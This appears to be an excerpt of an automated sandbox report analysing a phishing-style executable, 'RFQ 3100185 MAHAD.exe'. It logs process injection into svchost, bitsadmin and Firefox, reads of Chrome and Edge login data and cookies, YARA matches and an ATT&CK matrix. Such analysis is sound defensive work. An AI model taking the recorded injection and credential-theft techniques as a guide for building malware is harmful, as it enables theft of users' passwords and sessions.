                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038309AD mov eax, dword ptr fs:[00000030h]7_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038309AD mov eax, dword ptr fs:[00000030h]7_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B89B3 mov esi, dword ptr fs:[00000030h]7_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B89B3 mov eax, dword ptr fs:[00000030h]7_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B89B3 mov eax, dword ptr fs:[00000030h]7_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C69C0 mov eax, dword ptr fs:[00000030h]7_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383A9D0 mov eax, dword ptr fs:[00000030h]7_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038649D0 mov eax, dword ptr fs:[00000030h]7_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FA9D3 mov eax, dword ptr fs:[00000030h]7_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BE9E0 mov eax, dword ptr fs:[00000030h]7_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038629F9 mov eax, dword ptr fs:[00000030h]7_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038629F9 mov eax, dword ptr fs:[00000030h]7_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE908 mov eax, dword ptr fs:[00000030h]7_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE908 mov eax, dword ptr fs:[00000030h]7_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BC912 mov eax, dword ptr fs:[00000030h]7_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828918 mov eax, dword ptr fs:[00000030h]7_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828918 mov eax, dword ptr fs:[00000030h]7_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B892A mov eax, dword ptr fs:[00000030h]7_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C892B mov eax, dword ptr fs:[00000030h]7_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B0946 mov eax, dword ptr fs:[00000030h]7_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904940 mov eax, dword ptr fs:[00000030h]7_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]7_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]7_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03856962 mov eax, dword ptr fs:[00000030h]7_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387096E mov eax, dword ptr fs:[00000030h]7_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387096E mov edx, dword ptr fs:[00000030h]7_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387096E mov eax, dword ptr fs:[00000030h]7_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D4978 mov eax, dword ptr fs:[00000030h]7_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D4978 mov eax, dword ptr fs:[00000030h]7_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BC97C mov eax, dword ptr fs:[00000030h]7_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830887 mov eax, dword ptr fs:[00000030h]7_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BC89D mov eax, dword ptr fs:[00000030h]7_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E8C0 mov eax, dword ptr fs:[00000030h]7_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039008C0 mov eax, dword ptr fs:[00000030h]7_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FA8E4 mov eax, dword ptr fs:[00000030h]7_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C8F9 mov eax, dword ptr fs:[00000030h]7_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C8F9 mov eax, dword ptr fs:[00000030h]7_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BC810 mov eax, dword ptr fs:[00000030h]7_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]7_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]7_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03852835 mov eax, dword ptr fs:[00000030h]7_2_03852835
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_007EA66C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_007D81AC
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D8189 SetUnhandledExceptionFilter,1_2_007D8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtClose: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 8116Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DF1008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EB106 LogonUserW,1_2_007EB106
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_007B3D19
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F411C SendInput,keybd_event,1_2_007F411C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F74E7 mouse_event,1_2_007F74E7
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"Jump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_007EA66C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_007F71FA
                Source: RFQ 3100185 MAHAD.exe, KOXlLfnDPX.exe, 0000000A.00000000.1439073268.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3132289353.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3132694638.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: KOXlLfnDPX.exe, 0000000A.00000000.1439073268.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3132289353.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3132694638.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: KOXlLfnDPX.exe, 0000000A.00000000.1439073268.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3132289353.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3132694638.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: KOXlLfnDPX.exe, 0000000A.00000000.1439073268.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3132289353.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3132694638.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D65C4 cpuid 1_2_007D65C4
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0080091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,1_2_0080091D
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0082B340 GetUserNameW,1_2_0082B340
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_007E1E8E
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_007CDDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1524405847.0000000007D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132905244.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1519816258.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_81
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_XP
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_XPe
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_VISTA
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_7
                Source: RFQ 3100185 MAHAD.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1524405847.0000000007D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132905244.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1519816258.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00808C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00808C4F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0080923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_0080923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
